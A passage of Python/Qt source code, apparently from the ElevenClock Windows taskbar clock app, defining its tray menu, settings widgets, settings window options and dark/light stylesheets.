menu = QMenu(_("ElevenClock"))
menu.setWindowFlag(Qt.WindowStaysOnTopHint)
menu.setWindowFlags(menu.windowFlags() | Qt.FramelessWindowHint)
menu.setAttribute(Qt.WA_TranslucentBackground)
menu.addSeparator()
self.settingsAction = QAction(_("ElevenClock Settings"), app)
self.settingsAction.triggered.connect(lambda: sw.show())
menu.addAction(self.settingsAction)
self.reloadAction = QAction(_("Reload Clocks"), app)
self.reloadAction.triggered.connect(lambda: restartClocks())
menu.addAction(self.reloadAction)
menu.addSeparator()
self.nameAction = QAction(_("ElevenClock v{0}").format(version), app)
self.nameAction.setEnabled(False)
menu.addAction(self.nameAction)
menu.addSeparator()
self.restartAction = QAction(_("Restart ElevenClock"), app)
self.restartAction.triggered.connect(lambda: os.startfile(sys.executable))
menu.addAction(self.restartAction)
self.hideAction = QAction(_("Hide ElevenClock"), app)
self.hideAction.triggered.connect(lambda: closeClocks())
menu.addAction(self.hideAction)
self.quitAction = QAction(_("Quit ElevenClock"), app)
self.quitAction.triggered.connect(lambda: app.quit())
menu.addAction(self.quitAction)
self.setContextMenu(menu)
def reloadClocksIfRequired(reason: QSystemTrayIcon.ActivationReason) -> None:
if(reason != QSystemTrayIcon.ActivationReason.Context):
restartClocks()
self.activated.connect(lambda r: reloadClocksIfRequired(r))
if(getSettings("DisableSystemTray")):
self.hide()
print("system tray icon disabled")
self.applyStyleSheet()
def execMenu(self, pos: QPoint):
self.applyStyleSheet()
self.contextMenu().exec_(pos)
def getPx(self, original) -> int:
return int(original*(self.contextMenu().screen().logicalDotsPerInchX()/96))
def applyStyleSheet(self) -> None:
if(readRegedit(r"Software\Microsoft\Windows\CurrentVersion\Themes\Personalize", "AppsUseLightTheme", 1)==0):
self.iconMode = "white"
self.settingsAction.setIcon(QIcon(getPath(f"settings_{self.iconMode}.png")))
self.reloadAction.setIcon(QIcon(getPath(f"clock_{self.iconMode}.png")))
self.nameAction.setIcon(QIcon(getPath(f"about_{self.iconMode}.png")))
self.restartAction.setIcon(QIcon(getPath(f"restart_{self.iconMode}.png")))
self.hideAction.setIcon(QIcon(getPath(f"hide_{self.iconMode}.png")))
self.quitAction.setIcon(QIcon(getPath(f"close_{self.iconMode}.png")))
self.contextMenu().setStyleSheet(f"""
QWidget{{
background-color: transparent;
}}
QMenu {{
border: {self.getPx(1)}px solid rgb(60, 60, 60);
padding: {self.getPx(2)}px;
outline: 0px;
color: white;
background: #262626;
border-radius: {self.getPx(8)}px;
}}
QMenu::separator {{
margin: {self.getPx(2)}px;
height: {self.getPx(1)}px;
background: rgb(60, 60, 60);
}}
QMenu::icon{{
padding-left: {self.getPx(10)}px;
}}
QMenu::item{{
height: {self.getPx(30)}px;
border: none;
background: transparent;
padding-right: {self.getPx(10)}px;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
margin: {self.getPx(2)}px;
}}
QMenu::item:selected{{
background: rgba(255, 255, 255, 10%);
height: {self.getPx(30)}px;
outline: none;
border: none;
padding-right: {self.getPx(10)}px;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
QMenu::item:selected:disabled{{
background: transparent;
height: {self.getPx(30)}px;
outline: none;
border: none;
padding-right: {self.getPx(10)}px;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
""")
else:
self.iconMode = "black"
self.settingsAction.setIcon(QIcon(getPath(f"settings_{self.iconMode}.png")))
self.reloadAction.setIcon(QIcon(getPath(f"clock_{self.iconMode}.png")))
self.nameAction.setIcon(QIcon(getPath(f"about_{self.iconMode}.png")))
self.restartAction.setIcon(QIcon(getPath(f"restart_{self.iconMode}.png")))
self.hideAction.setIcon(QIcon(getPath(f"hide_{self.iconMode}.png")))
self.quitAction.setIcon(QIcon(getPath(f"close_{self.iconMode}.png")))
self.contextMenu().setStyleSheet(f"""
QWidget{{
background-color: transparent;
}}
QMenu {{
border: {self.getPx(1)}px solid rgb(200, 200, 200);
padding: {self.getPx(2)}px;
outline: 0px;
color: black;
background: #eeeeee;
border-radius: {self.getPx(8)}px;
}}
QMenu::separator {{
margin: {self.getPx(2)}px;
height: {self.getPx(1)}px;
background: rgb(200, 200, 200);
}}
QMenu::icon{{
padding-left: {self.getPx(10)}px;
}}
QMenu::item{{
height: {self.getPx(30)}px;
border: none;
background: transparent;
padding-right: {self.getPx(10)}px;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
margin: {self.getPx(2)}px;
}}
QMenu::item:selected{{
background: rgba(0, 0, 0, 10%);
height: {self.getPx(30)}px;
outline: none;
border: none;
padding-right: {self.getPx(10)}px;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
QMenu::item:selected:disabled{{
background: transparent;
height: {self.getPx(30)}px;
outline: none;
border: none;
padding-right: {self.getPx(10)}px;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
""")
class QIconLabel(QWidget):
def __init__(self, text, icon=None):
super().__init__()
self.setObjectName("subtitleLabel")
self.label = QLabel(text, self)
if lang == lang_zh_TW:
self.label.setStyleSheet("font-size: 13pt;background: none;font-family: \"Microsoft JhengHei UI\";")
else:
self.label.setStyleSheet("font-size: 13pt;background: none;font-family: \"Segoe UI Variable Display\";")
self.image = QLabel(self)
self.image.setPixmap(QIcon(icon).pixmap(QSize(24, 24)))
self.image.setStyleSheet("padding: 3px;background: none;")
self.setAttribute(Qt.WA_StyledBackground)
def getPx(self, original) -> int:
return int(original*(self.screen().logicalDotsPerInchX()/96))
def setIcon(self, icon: str) -> None:
self.image.setPixmap(QIcon(icon).pixmap(QSize(24, 24)))
def resizeEvent(self, event: QResizeEvent) -> None:
self.label.move(self.getPx(60), self.getPx(25))
self.label.setFixedHeight(self.getPx(30))
self.image.move(self.getPx(22), self.getPx(25))
self.image.setFixedHeight(self.getPx(30))
self.setFixedHeight(self.getPx(70))
self.image.setFixedHeight(self.getPx(30))
self.label.setFixedWidth(self.width()-self.getPx(70))
self.image.setFixedWidth(self.getPx(30))
return super().resizeEvent(event)
class QSettingsButton(QWidget):
clicked = Signal()
def __init__(self, text="", btntext="", parent=None, h = 30):
super().__init__(parent)
self.fh = h
self.setAttribute(Qt.WA_StyledBackground)
self.button = QPushButton(btntext+" ", self)
self.button.setLayoutDirection(Qt.RightToLeft)
self.setObjectName("stBtn")
self.label = QLabel(text, self)
if lang == lang_zh_TW:
self.label.setStyleSheet("font-size: 10pt;background: none;font-family: \"Microsoft JhengHei UI\";font-weight: 450;")
self.button.setStyleSheet("font-size: 10pt;font-family: \"Microsoft JhengHei UI\";font-weight: 450;")
self.label.setObjectName("StLbl")
else:
self.label.setStyleSheet("font-size: 9pt;background: none;font-family: \"Segoe UI Variable Text\";font-weight: 450;")
self.button.setStyleSheet("font-size: 9pt;font-family: \"Segoe UI Variable Text\";font-weight: 450;")
self.label.setObjectName("StLbl")
self.button.clicked.connect(self.clicked.emit)
def getPx(self, original) -> int:
return int(original*(self.screen().logicalDotsPerInchX()/96))
def resizeEvent(self, event: QResizeEvent) -> None:
self.button.move(self.width()-self.getPx(170), self.getPx(10))
self.label.move(self.getPx(60), self.getPx(10))
self.label.setFixedWidth(self.width()-self.getPx(230))
self.label.setFixedHeight(self.getPx(self.fh))
self.setFixedHeight(self.getPx(50+(self.fh-30)))
self.button.setFixedHeight(self.getPx(self.fh))
self.button.setFixedWidth(self.getPx(150))
return super().resizeEvent(event)
def setIcon(self, icon: QIcon) -> None:
self.button.setIcon(icon)
class QSettingsComboBox(QWidget):
textChanged = Signal(str)
def __init__(self, text="", btntext="", parent=None):
super().__init__(parent)
self.setAttribute(Qt.WA_StyledBackground)
self.combobox = QComboBox(self)
self.combobox.setObjectName("stCmbbx")
self.combobox.setItemDelegate(QStyledItemDelegate(self.combobox))
self.setObjectName("stBtn")
self.restartButton = QPushButton("Restart ElevenClock", self)
self.restartButton.hide()
self.restartButton.setObjectName("AccentButton")
self.label = QLabel(text, self)
if lang == lang_zh_TW:
self.label.setStyleSheet("font-size: 11pt;background: none;font-family: \"Microsoft JhengHei UI\";font-weight: 450;")
self.combobox.setStyleSheet("font-size: 11pt;font-family: \"Microsoft JhengHei UI\";font-weight: 450;")
self.restartButton.setStyleSheet("font-size: 11pt;font-family: \"Microsoft JhengHei UI\";font-weight: 450;")
else:
self.label.setStyleSheet("font-size: 9pt;background: none;font-family: \"Segoe UI Variable Text\";font-weight: 450;")
self.combobox.setStyleSheet("font-size: 9pt;font-family: \"Segoe UI Variable Text\";font-weight: 450;")
self.restartButton.setStyleSheet("font-size: 9pt;font-family: \"Segoe UI Variable Text\";font-weight: 450;")
self.label.setObjectName("StLbl")
def getPx(self, original) -> int:
return int(original*(self.screen().logicalDotsPerInchX()/96))
def setItems(self, items: list, index: int) -> None:
self.combobox.addItems(items)
try:
self.combobox.setCurrentIndex(index)
except Exception as e:
print(e)
self.combobox.setCurrentIndex(0)
self.combobox.currentTextChanged.connect(self.textChanged.emit)
def resizeEvent(self, event: QResizeEvent) -> None:
self.combobox.move(self.width()-self.getPx(170), self.getPx(10))
self.label.move(self.getPx(60), self.getPx(10))
self.label.setFixedWidth(self.width()-self.getPx(380))
self.label.setFixedHeight(self.getPx(30))
self.restartButton.move(self.width()-self.getPx(330), self.getPx(10))
self.restartButton.setFixedWidth(self.getPx(150))
self.restartButton.setFixedHeight(self.getPx(30))
self.setFixedHeight(self.getPx(50))
self.combobox.setFixedHeight(self.getPx(30))
self.combobox.setFixedWidth(self.getPx(150))
return super().resizeEvent(event)
def setIcon(self, icon: QIcon) -> None:
pass
#self.button.setIcon(icon)
def showRestartButton(self) -> None:
self.restartButton.show()
class QSettingsCheckBox(QWidget):
stateChanged = Signal(bool)
def __init__(self, text="", parent=None):
super().__init__(parent)
self.setAttribute(Qt.WA_StyledBackground)
self.setObjectName("stChkBg")
self.checkbox = QCheckBox(text, self)
if lang == lang_zh_TW:
self.checkbox.setStyleSheet("font-size: 11pt;background: none;font-family: \"Microsoft JhengHei UI\";font-weight: 450;")
else:
self.checkbox.setStyleSheet("font-size: 9pt;background: none;font-family: \"Segoe UI Variable Text\";font-weight: 450;")
self.checkbox.setObjectName("stChk")
self.checkbox.stateChanged.connect(self.stateChanged.emit)
def setChecked(self, checked: bool) -> None:
self.checkbox.setChecked(checked)
def isChecked(self) -> bool:
return self.checkbox.isChecked()
def getPx(self, original) -> int:
return int(original*(self.screen().logicalDotsPerInchX()/96))
def resizeEvent(self, event: QResizeEvent) -> None:
self.checkbox.move(self.getPx(60), self.getPx(10))
self.checkbox.setFixedHeight(self.getPx(30))
self.checkbox.setFixedWidth(self.width()-self.getPx(70))
self.setFixedHeight(self.getPx(50))
return super().resizeEvent(event)
class SettingsWindow(QScrollArea):
def __init__(self):
super().__init__()
layout = QVBoxLayout()
self.updateSize = True
self.setWidgetResizable(True)
self.resizewidget = QWidget()
self.resizewidget.setObjectName("background")
self.setWindowIcon(QIcon(os.path.join(realpath, "icon.ico")))
layout.addSpacing(10)
title = QLabel(_("ElevenClock Settings"))
title.setObjectName("title")
if lang == lang_zh_TW:
title.setStyleSheet("font-size: 25pt;font-family: \"Microsoft JhengHei UI\";font-weight: 450;")
else:
title.setStyleSheet("font-size: 25pt;font-family: \"Segoe UI Variable Text\";font-weight: 450;")
layout.addWidget(title)
layout.setSpacing(0)
layout.setContentsMargins(0, 0, 0, 0)
layout.addSpacing(10)
self.resize(900, 600)
layout.addSpacing(20)
self.setFrameShape(QFrame.NoFrame)
if(readRegedit(r"Software\Microsoft\Windows\CurrentVersion\Themes\Personalize", "AppsUseLightTheme", 1)==0):
self.iconMode = "white"
else:
self.iconMode = "black"
self.generalSettingsTitle = QIconLabel(_("General Settings:"), getPath(f"settings_{self.iconMode}.png"))
layout.addWidget(self.generalSettingsTitle)
self.updateButton = QSettingsButton(_("<b>Update to the lastest version!</b>"), _("Install update"))
self.updateButton.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
self.updateButton.clicked.connect(lambda: KillableThread(target=updateIfPossible, args=((True,))).start())
self.updateButton.hide()
layout.addWidget(self.updateButton)
self.selectedLanguage = QSettingsComboBox("ElevenClock's language", _("Change"))
self.selectedLanguage.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
try:
self.selectedLanguage.setItems(list(languageReference.values()), list(languageReference.keys()).index(langName))
except Exception as e:
print(e)
self.selectedLanguage.setItems(list(languageReference.values()), 0)
def changeLang(text):
keys = list(languageReference.keys())
values = list(languageReference.values())
for i in range(len(values)):
if(text == values[i]):
setSettingsValue("PreferredLanguage", str(keys[i]), r=False)
self.selectedLanguage.showRestartButton()
def restartElevenClockByLangChange():
subprocess.run(str("start /B \"\" \""+sys.executable)+"\" --settings", shell=True)
app.quit()
self.selectedLanguage.restartButton.clicked.connect(restartElevenClockByLangChange)
self.selectedLanguage.textChanged.connect(changeLang)
layout.addWidget(self.selectedLanguage)
self.updatesChBx = QSettingsCheckBox(_("Automatically check for updates"))
self.updatesChBx.setChecked(not(getSettings("DisableAutoCheckForUpdates")))
self.updatesChBx.stateChanged.connect(lambda i: setSettings("DisableAutoCheckForUpdates", not(bool(i)), r = False))
layout.addWidget(self.updatesChBx)
self.updatesChBx = QSettingsCheckBox(_("Automatically install available updates"))
self.updatesChBx.setChecked(not(getSettings("DisableAutoInstallUpdates")))
self.updatesChBx.stateChanged.connect(lambda i: setSettings("DisableAutoInstallUpdates", not(bool(i)), r = False))
layout.addWidget(self.updatesChBx)
self.updatesChBx = QSettingsCheckBox(_("Enable really silent updates"))
self.updatesChBx.setChecked((getSettings("EnableSilentUpdates")))
self.updatesChBx.stateChanged.connect(lambda i: setSettings("EnableSilentUpdates", bool(i), r = False))
layout.addWidget(self.updatesChBx)
self.updatesChBx = QSettingsCheckBox(_("Bypass update provider authenticity check (NOT RECOMMENDED, AT YOUR OWN RISK)"))
self.updatesChBx.setChecked((getSettings("BypassDomainAuthCheck")))
self.updatesChBx.stateChanged.connect(lambda i: setSettings("BypassDomainAuthCheck", bool(i), r = False))
layout.addWidget(self.updatesChBx)
self.updatesChBx = QSettingsCheckBox(_("Show ElevenClock on system tray"))
self.updatesChBx.setChecked(not(getSettings("DisableSystemTray")))
self.updatesChBx.stateChanged.connect(lambda i: setSettings("DisableSystemTray", not(bool(i))))
layout.addWidget(self.updatesChBx)
self.updatesChBx = QSettingsCheckBox(_("Alternative clock alignment (may not work)"))
self.updatesChBx.setChecked((getSettings("EnableWin32API")))
self.updatesChBx.stateChanged.connect(lambda i: setSettings("EnableWin32API", bool(i)))
layout.addWidget(self.updatesChBx)
self.startupButton = QSettingsButton(_("Change startup behaviour"), _("Change"))
self.startupButton.clicked.connect(lambda: os.startfile("ms-settings:startupapps"))
layout.addWidget(self.startupButton)
layout.addSpacing(10)
self.clockSettingsTitle = QIconLabel(_("Clock Settings:"), getPath(f"clock_{self.iconMode}.png"))
layout.addWidget(self.clockSettingsTitle)
self.updatesChBx = QSettingsCheckBox(_("Hide the clock in fullscreen mode"))
self.updatesChBx.setChecked((getSettings("EnableHideOnFullScreen")))
self.updatesChBx.stateChanged.connect(lambda i: setSettings("EnableHideOnFullScreen", bool(i)))
layout.addWidget(self.updatesChBx)
self.updatesChBx = QSettingsCheckBox(_("Hide the clock when RDP Client or Citrix Workspace are running"))
self.updatesChBx.setChecked((getSettings("EnableHideOnRDP")))
self.updatesChBx.stateChanged.connect(lambda i: setSettings("EnableHideOnRDP", bool(i)))
layout.addWidget(self.updatesChBx)
self.updatesChBx = QSettingsCheckBox(_("Show the clock when the taskbar is set to hide automatically"))
self.updatesChBx.setChecked((getSettings("DisableHideWithTaskbar")))
self.updatesChBx.stateChanged.connect(lambda i: setSettings("DisableHideWithTaskbar", bool(i)))
layout.addWidget(self.updatesChBx)
self.updatesChBx = QSettingsCheckBox(_("Force the clock to be at the bottom of the screen"))
self.updatesChBx.setChecked((getSettings("ForceOnBottom")))
self.updatesChBx.stateChanged.connect(lambda i: setSettings("ForceOnBottom", bool(i)))
layout.addWidget(self.updatesChBx)
self.updatesChBx = QSettingsCheckBox(_("Show the clock at the left of the screen"))
self.updatesChBx.setChecked((getSettings("ClockOnTheLeft")))
self.updatesChBx.stateChanged.connect(lambda i: setSettings("ClockOnTheLeft", bool(i)))
layout.addWidget(self.updatesChBx)
self.updatesChBx = QSettingsCheckBox(_("Show the clock on the primary screen (Useful if clock is set on the left)"))
self.updatesChBx.setStyleSheet(f"QWidget#stChkBg{{border-bottom-left-radius: {self.getPx(6)}px;border-bottom-right-radius: {self.getPx(6)}px;border-bottom: 1px;}}")
self.updatesChBx.setChecked((getSettings("ForceClockOnFirstMonitor")))
self.updatesChBx.stateChanged.connect(lambda i: setSettings("ForceClockOnFirstMonitor", bool(i)))
layout.addWidget(self.updatesChBx)
layout.addSpacing(10)
self.clockAppearanceTitle = QIconLabel(_("Clock Appearance:"), getPath(f"appearance_{self.iconMode}.png"))
layout.addWidget(self.clockAppearanceTitle)
self.updatesChBx = QSettingsCheckBox(_("Fix the hyphen/dash showing over the month"))
self.updatesChBx.setChecked((getSettings("EnableHyphenFix")))
self.updatesChBx.stateChanged.connect(lambda i: setSettings("EnableHyphenFix", bool(i)))
layout.addWidget(self.updatesChBx)
self.updatesChBx = QSettingsCheckBox(_("Force the clock to have black text"))
self.updatesChBx.setChecked((getSettings("ForceLightTheme")))
self.updatesChBx.stateChanged.connect(lambda i: setSettings("ForceLightTheme", bool(i)))
layout.addWidget(self.updatesChBx)
self.updatesChBx = QSettingsCheckBox(_("Force the clock to have white text")+_(" - It is required that the Dark Text checkbox is disabled"))
self.updatesChBx.setChecked((getSettings("ForceDarkTheme")))
self.updatesChBx.setStyleSheet(f"QWidget#stChkBg{{border-bottom-left-radius: {self.getPx(6)}px;border-bottom-right-radius: {self.getPx(6)}px;border-bottom: 1px;}}")
self.updatesChBx.stateChanged.connect(lambda i: setSettings("ForceDarkTheme", bool(i)))
layout.addWidget(self.updatesChBx)
#self.updatesChBx = QSettingsCheckBox(_("Align the clock text to the center"))
#self.updatesChBx.setChecked((getSettings("CenterAlignment")))
#self.updatesChBx.setStyleSheet(f"QWidget#stChkBg{{border-bottom-left-radius: {self.getPx(6)}px;border-bottom-right-radius: {self.getPx(6)}px;border-bottom: 1px;}}")
#self.updatesChBx.stateChanged.connect(lambda i: setSettings("CenterAlignment", bool(i)))
#layout.addWidget(self.updatesChBx)
layout.addSpacing(10)
self.dateTimeTitle = QIconLabel(_("Date & Time Settings:"), getPath(f"datetime_{self.iconMode}.png"))
layout.addWidget(self.dateTimeTitle)
self.updatesChBx = QSettingsCheckBox(_("Show seconds on the clock"))
self.updatesChBx.setChecked((getSettings("EnableSeconds")))
self.updatesChBx.stateChanged.connect(lambda i: setSettings("EnableSeconds", bool(i), r = False))
layout.addWidget(self.updatesChBx)
self.updatesChBx = QSettingsCheckBox(_("Show date on the clock"))
self.updatesChBx.setChecked(not(getSettings("DisableDate")))
self.updatesChBx.stateChanged.connect(lambda i: setSettings("DisableDate", not(bool(i))))
layout.addWidget(self.updatesChBx)
self.updatesChBx = QSettingsCheckBox(_("Show time on the clock"))
self.updatesChBx.setChecked(not(getSettings("DisableTime")))
self.updatesChBx.stateChanged.connect(lambda i: setSettings("DisableTime", not(bool(i))))
layout.addWidget(self.updatesChBx)
self.updatesChBx = QSettingsCheckBox(_("Show weekday on the clock"))
self.updatesChBx.setChecked(getSettings("EnableWeekDay"))
self.updatesChBx.stateChanged.connect(lambda i: setSettings("EnableWeekDay", bool(i)))
layout.addWidget(self.updatesChBx)
self.RegionButton = QSettingsButton(_("Change date and time format (Regional settings)"), _("Regional settings"))
self.RegionButton.clicked.connect(lambda: os.startfile("intl.cpl"))
layout.addWidget(self.RegionButton)
layout.addSpacing(10)
self.languageSettingsTitle = QIconLabel(_("About the language pack:").format(version), getPath(f"lang_{self.iconMode}.png"))
layout.addWidget(self.languageSettingsTitle)
self.PackInfoButton = QSettingsButton(_("Translated to English by martinet101"), "")
self.PackInfoButton.button.hide()
self.PackInfoButton.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
layout.addWidget(self.PackInfoButton)
self.openTranslateButton = QSettingsButton(_("Translate ElevenClock to your language"), _("Get started"))
self.openTranslateButton.clicked.connect(lambda: self.hide())
layout.addWidget(self.openTranslateButton)
layout.addSpacing(10)
self.aboutTitle = QIconLabel(_("About ElevenClock version {0}:").format(version), getPath(f"about_{self.iconMode}.png"))
layout.addWidget(self.aboutTitle)
self.WebPageButton = QSettingsButton(_("View ElevenClock's homepage"), _("Open"))
self.WebPageButton.clicked.connect(lambda: os.startfile("https://github.com/martinet101/ElevenClock/"))
self.WebPageButton.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
layout.addWidget(self.WebPageButton)
self.IssueButton = QSettingsButton(_("Report an issue/request a feature"), _("Report"))
self.IssueButton.clicked.connect(lambda: os.startfile("https://github.com/martinet101/ElevenClock/issues/new/choose"))
self.IssueButton.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
layout.addWidget(self.IssueButton)
self.CofeeButton = QSettingsButton(_("Support the dev: Give me a coffee☕"), _("Open page"))
self.CofeeButton.clicked.connect(lambda: os.startfile("https://ko-fi.com/martinet101"))
self.CofeeButton.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
layout.addWidget(self.CofeeButton)
self.PichonButton = QSettingsButton(_("Icons by Icons8"), _("Webpage"))
self.PichonButton.clicked.connect(lambda: os.startfile("https://icons8.com/"))
self.PichonButton.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
layout.addWidget(self.PichonButton)
self.closeButton = QSettingsButton(_("Close settings"), _("Close"))
self.closeButton.clicked.connect(lambda: self.hide())
layout.addWidget(self.closeButton)
layout.addSpacing(10)
self.debbuggingTitle = QIconLabel(_("Debbugging information:").format(version), getPath(f"bug_{self.iconMode}.png"))
layout.addWidget(self.debbuggingTitle)
self.logButton = QSettingsButton(_("Open ElevenClock's log"), _("Open"))
self.logButton.clicked.connect(lambda: self.showDebugInfo())
self.logButton.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
layout.addWidget(self.logButton)
self.hiddenButton = QSettingsButton(f"ElevenClock Version: {version} {platform.architecture()[0]}\nSystem version: {platform.system()} {platform.release()} {platform.win32_edition()} {platform.version()}\nSystem architecture: {platform.machine()}\n\nTotal RAM: {psutil.virtual_memory().total/(1000.**3)}\n\nSystem locale: {locale.getdefaultlocale()[0]}\nElevenClock language locale: lang_{langName}", _(""), h=130)
self.hiddenButton.button.setVisible(False)
layout.addWidget(self.hiddenButton)
layout.addSpacing(15)
self.resizewidget.setLayout(layout)
self.setWidget(self.resizewidget)
self.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
self.setVerticalScrollBarPolicy(Qt.ScrollBarAsNeeded)
self.setWindowTitle(_("ElevenClock Settings"))
self.applyStyleSheet()
self.setMinimumWidth(400)
def applyStyleSheet(self):
colors = ['215,226,228', '160,174,183', '101,116,134', '81,92,107', '69,78,94', '41,47,64', '15,18,36', '239,105,80']
string = readRegedit(r"Software\Microsoft\Windows\CurrentVersion\Explorer\Accent", "AccentPalette", b'\xe9\xd8\xf1\x00\xcb\xb7\xde\x00\x96}\xbd\x00\x82g\xb0\x00gN\x97\x00H4s\x00#\x13K\x00\x88\x17\x98\x00')
i = 0
for color in string.split(b"\x00"):
try:
if(len(color)==3):
colors[i] = f"{color[0]},{color[1]},{color[2]}"
else:
print("NullColor")
except IndexError:
pass
finally:
i += 1
print(colors)
if(readRegedit(r"Software\Microsoft\Windows\CurrentVersion\Themes\Personalize", "AppsUseLightTheme", 1)==0):
self.iconMode = "white"
self.aboutTitle.setIcon(getPath(f"about_{self.iconMode}.png"))
self.dateTimeTitle.setIcon(getPath(f"datetime_{self.iconMode}.png"))
self.clockSettingsTitle.setIcon(getPath(f"clock_{self.iconMode}.png"))
self.languageSettingsTitle.setIcon(getPath(f"lang_{self.iconMode}.png"))
self.generalSettingsTitle.setIcon(getPath(f"settings_{self.iconMode}.png"))
self.PichonButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.closeButton.setIcon(QIcon(getPath(f"close_{self.iconMode}.png")))
self.startupButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.RegionButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.IssueButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.IssueButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.WebPageButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.logButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.debbuggingTitle.setIcon(QIcon(getPath(f"bug_{self.iconMode}.png")))
self.clockAppearanceTitle.setIcon(QIcon(getPath(f"appearance_{self.iconMode}.png")))
self.CofeeButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.openTranslateButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.setStyleSheet(f"""
QMenu {{
border: {self.getPx(1)}px solid rgb(60, 60, 60);
padding: {self.getPx(2)}px;
outline: 0px;
color: white;
background: #262626;
border-radius: {self.getPx(8)}px;
}}
QMenu::separator {{
margin: {self.getPx(2)}px;
height: {self.getPx(1)}px;
background: rgb(60, 60, 60);
}}
QMenu::icon{{
padding-left: {self.getPx(10)}px;
}}
QMenu::item{{
height: {self.getPx(30)}px;
border: none;
background: transparent;
padding-right: {self.getPx(10)}px;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
margin: {self.getPx(2)}px;
}}
QMenu::item:selected{{
background: rgba(255, 255, 255, 10%);
height: {self.getPx(30)}px;
outline: none;
border: none;
padding-right: {self.getPx(10)}px;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
QMenu::item:selected:disabled{{
background: transparent;
height: {self.getPx(30)}px;
outline: none;
border: none;
padding-right: {self.getPx(10)}px;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
#background,QScrollArea,QMessageBox{{
color: white;
background-color: #212121;
}}
* {{
color: #dddddd;
font-size: 8pt;
}}
QPlainTextEdit{{
font-family: "Cascadia Mono";
background-color: #212121;
selection-background-color: rgb({colors[4]});
border: none;
}}
QPushButton {{
width: 100px;
background-color: #363636;
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid #393939;
height: {self.getPx(25)}px;
border-top: {self.getPx(1)}px solid #404040;
}}
QPushButton:hover {{
background-color: #393939;
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid #414141;
height: {self.getPx(25)}px;
border-top: {self.getPx(1)}px solid #454545;
}}
#AccentButton{{
background-color: rgb({colors[3]});
border-color: rgb({colors[2]});
border-top-color: rgb({colors[1]});
}}
#AccentButton:hover{{
background-color: rgb({colors[2]});
border-color: rgb({colors[1]});
border-top-color: rgb({colors[1]});
}}
#title{{
background-color: #303030;
margin: {self.getPx(10)}px;
margin-bottom: 0px;
padding-left: {self.getPx(20)}px;
padding-top: {self.getPx(15)}px;
padding-bottom: {self.getPx(15)}px;
border: {self.getPx(1)}px solid #1c1c1c;
border-bottom: 0px;
font-size: 13pt;
border-radius: {self.getPx(6)}px;
}}
#subtitleLabel{{
background-color: #303030;
margin: {self.getPx(10)}px;
margin-bottom: 0px;
padding-left: {self.getPx(20)}px;
padding-top: {self.getPx(15)}px;
padding-bottom: {self.getPx(15)}px;
border: {self.getPx(1)}px solid #1c1c1c;
border-bottom: 0px;
font-size: 13pt;
border-top-left-radius: {self.getPx(6)}px;
border-top-right-radius: {self.getPx(6)}px;
}}
#StLbl{{
padding: 0px;
background-color: #303030;
margin: 0px;
border:none;
font-size: {self.getPx(11)}px;
}}
#stBtn{{
background-color: #303030;
margin: {self.getPx(10)}px;
margin-bottom: 0px;
margin-top: 0px;
border: {self.getPx(1)}px solid #1c1c1c;
border-bottom: 0px;
border-bottom-left-radius: {self.getPx(6)}px;
border-bottom-right-radius: {self.getPx(6)}px;
}}
#lastWidget{{
border-bottom-left-radius: {self.getPx(6)}px;
border-bottom-right-radius: {self.getPx(6)}px;
}}
#stChkBg{{
padding: {self.getPx(15)}px;
padding-left: {self.getPx(45)}px;
background-color: #303030;
margin: {self.getPx(10)}px;
margin-bottom: 0px;
margin-top: 0px;
border: {self.getPx(1)}px solid #1c1c1c;
border-bottom: 0px;
}}
#stChk::indicator{{
height: {self.getPx(20)}px;
width: {self.getPx(20)}px;
}}
#stChk::indicator:unchecked {{
background-color: #252525;
border: {self.getPx(1)}px solid #444444;
border-radius: {self.getPx(6)}px;
}}
#stChk::indicator:unchecked:hover {{
background-color: #2a2a2a;
border: {self.getPx(1)}px solid #444444;
border-radius: {self.getPx(6)}px;
}}
#stChk::indicator:checked {{
border: {self.getPx(1)}px solid #444444;
background-color: rgb({colors[1]});
border-radius: {self.getPx(6)}px;
image: url("{getPath("tick_white.png")}");
}}
#stChk::indicator:checked:hover {{
border: {self.getPx(1)}px solid #444444;
background-color: rgb({colors[2]});
border-radius: {self.getPx(6)}px;
image: url("{getPath("tick_white.png")}");
}}
#stCmbbx {{
width: 100px;
background-color: #363636;
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid #393939;
